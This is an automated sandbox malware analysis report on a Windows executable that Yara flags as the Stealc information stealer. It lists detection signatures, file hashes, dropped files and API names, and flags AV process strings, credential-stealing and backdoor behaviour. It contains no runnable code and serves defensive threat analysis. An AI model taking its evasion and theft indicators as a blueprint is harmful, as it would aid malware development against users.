Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_000E416A

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.19.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2258545852.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 478F.tmp.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

OS version to string mapping found (often used in BOTs)

Source: Welding.pif	Binary or memory string: WIN_81
Source: Welding.pif	Binary or memory string: WIN_XP
Source: Welding.pif	Binary or memory string: WIN_XPe
Source: Welding.pif	Binary or memory string: WIN_VISTA
Source: Welding.pif	Binary or memory string: WIN_7
Source: Welding.pif	Binary or memory string: WIN_8
Source: Reference.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2258545852.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 478F.tmp.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042287C Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,		15_2_0042287C
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00421BA6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,		15_2_00421BA6

Windows Analysis Report
M13W1o3scc.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1528594
Product:	CloudBasic
Start time:	03:51:09
Start date:	08.10.2024
Sample:	M13W1o3scc.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e6dd6a25125edd4c21fe5cf7bafcd2bb
SHA1:	c1b1ec6b5e78fcaff4290bff55ae86ee8816f715
SHA256:	523cd90154c376b7f6953f1e825eb467b231b3fffe30ab321c1a69da22cb1148
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_478F.tmp.exe_b15f1ed1fbe05deb7bf8632b253ff5c7eae35c3_ce0698c2_34045723-5be5-429e-9efc-972a5ba8c6e1\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	D07B0C692FC26D95364DF0D31FE5A7C0	E7086B608A957FAEFAAF2331425C62A99AF2A3F9	B0C596B88D6C3FBEAD4541E6A0E2EC903129EC9013EE9260F57DEAC12CBE721E
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D33.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Oct 8 01:52:47 2024, 0x1205a4 type	16EC14423A6AA33001D49A21CB55D3F9	5A288D4A6219054E0330E1590202CF52CDEFA856	AADCEA81393B07389AA0E8A1ABA4895A977F20F24F0E30C1632C43A1885A6847
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DFF.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	DA520B126AC6FEBD9608D93D687BBCEC	E1F4BCA2F96E68A075964A59BAA99B1F283AC68F	4C190CF3E9E7B5B1F8894025A70932FCFFD038F3890C32A443940E095C50C614
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E3E.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	229FD2812226868C51A1BDF5086664CD	62095D31CB484B06425142F01587CAC9F7B1785C	ACE77BF49894C3EC4E822268DF5D8B855578C3200255141FA618453C66AEF7C2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	E35C6AD41081DDCDA2BA9C65B5B1A6F8	E675AD90C164244BAC1C3A5CBACC932E9E0B3A8D	100F1C346CBCFF15F4D9D75C791000625850E1C82B44CE9427CCF441F5C3CB79
C:\Users\user\AppData\Local\Temp\478F.tmp.exe	PE32 executable (GUI) Intel 80386, for MS Windows	E35C6AD41081DDCDA2BA9C65B5B1A6F8	E675AD90C164244BAC1C3A5CBACC932E9E0B3A8D	100F1C346CBCFF15F4D9D75C791000625850E1C82B44CE9427CCF441F5C3CB79
C:\Users\user\AppData\Local\Temp\773416\A	data	DF745BE339BBF748CF1D17FB8C06B640	B66A902635B9F136ACE5A959F6C71E74F3F46AB9	FDB35C26DF7FA1EDC203E2A31469ED59BA3C36CF21961C40339FC27ADB619B6B
C:\Users\user\AppData\Local\Temp\773416\Welding.pif	PE32 executable (GUI) Intel 80386, for MS Windows	18CE19B57F43CE0A5AF149C96AECC685	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
C:\Users\user\AppData\Local\Temp\Bangladesh	data	FDAE88ED4CC045029526C2128F948C77	4BC37DA56AE2B8CC2A0698F7E0DCECAD9CE6FF00	B6594677913CAB2A65A6181B9F3BE75354482771C897D023EDFD739EB4741D22
C:\Users\user\AppData\Local\Temp\Completely	data	DE6D628C6065D2A3CE8651EB80632760	B5526B6783518931561027431A68AA912CBE67ED	49CAD214CB62228E014E65F96FEBBBC3073561E0AD5D654F104D96AD7E702B4D
C:\Users\user\AppData\Local\Temp\Cool	data	65A71296F130A1730A497507324FB143	324346489DA3C584DB2B5A66BB4ECB03B82E504C	8993E508819C4695EBA97D4AE46E306554C986DCAEE111F9E39689C0C8C851D9
C:\Users\user\AppData\Local\Temp\Diet	data	A5901FBBFFB3B72E1BE2A28489FE74B4	69AD2C778CED4029D46FAD8AAA99AC394D51006A	AF9206B54BFA4A6BCAF9F2CE6515451C25FE8756FCC65324E0FD2039D85AD0EC
C:\Users\user\AppData\Local\Temp\Enclosure	data	DE1ADA156C1E3718157F06C11AF5920F	091AB85826DC3100B518272C18709D035EBED950	5C94C0B2C717B53F58C815D6277AEEC068606DFD2A8ABD98033B61336D8CE5A9
C:\Users\user\AppData\Local\Temp\Halo	ASCII text, with very long lines (806), with CRLF line terminators	57B804853E07DA1EBC6A9C420E68F0E1	B31F21A3B924F017DDF6A6849AD17439B0B929C7	E8D929F7CFB4DE6AA4097E1240BE42EB3576D043E9A3D685CB7596B2B9F2B8E8
C:\Users\user\AppData\Local\Temp\Halo.bat (copy)	ASCII text, with very long lines (806), with CRLF line terminators	57B804853E07DA1EBC6A9C420E68F0E1	B31F21A3B924F017DDF6A6849AD17439B0B929C7	E8D929F7CFB4DE6AA4097E1240BE42EB3576D043E9A3D685CB7596B2B9F2B8E8
C:\Users\user\AppData\Local\Temp\Mobility	data	1FA7E13726678638DDBA735F37332B66	8B34D68C5B3BAE34B8EEF149F91D074D1EF4EE90	0459D7D231B4AFF6939621532F27E5E771BA602D766527FBF9C90FFB3B701AA7
C:\Users\user\AppData\Local\Temp\Partition	data	90A36351590FE11ED46C3D5871AE07F7	43AD4BB6321BCAD808DD39A2F7137BB9649E360C	07994A4A252E77CEA5147B40FDB8504E559CD6E5196777803E91D4337F511C8C
C:\Users\user\AppData\Local\Temp\Reference	data	C508E3085AE5BB8C9ED62A944D5982E1	70372374A97BE905EE23DFF8DB8D84A4E1FAF2B9	6ED342E3C416B923A1339D9D5000B08DADC025C7AA9FD7396D2BED961C8FD5CB
C:\Users\user\AppData\Local\Temp\Transmit	data	C04A12FE1745C5DB83A1DC95A0EE5084	6AA64B9E62DED24CA0E94A26994EE913C29D15CA	6F85E4E44863D0481A3551AE3BBF235AD3869EAEDF403B9EC2F5AE03E29F351D
C:\Users\user\AppData\Local\Temp\Turtle	data	12F0E0FEEDA74A75CE2D87246A76D65C	215C858D9192E8E3CB57E229349FF444C9E438B7	8B178B94D092EC1EF2C284FC98B1E90D3D314EB7938CCC9BF6E268B40ACF7E8D
C:\Users\user\AppData\Local\Temp\Vienna	data	876A87F075D91AD8BA48E3DB1AFFDE91	426142730D47E7D57811CDC0932BE4ADBFBC87C2	F0C9A098A0ACEAF86CD184F115C7941EC091A6BA1754AFA6CC9CDDF00DDC1B74
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	D1C171F4AC9A3A5CA808CD2B1EA5DF67	FEA95658C093831F610A09BDC98FB0525760B96E	A4C20233CC50D1D3814138CE6F158D321CFD5E8B8CC37F9AED216E7B84F0E2B0

Windows Analysis Report M13W1o3scc.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
M13W1o3scc.exe

Malware Threat Intel
Provided by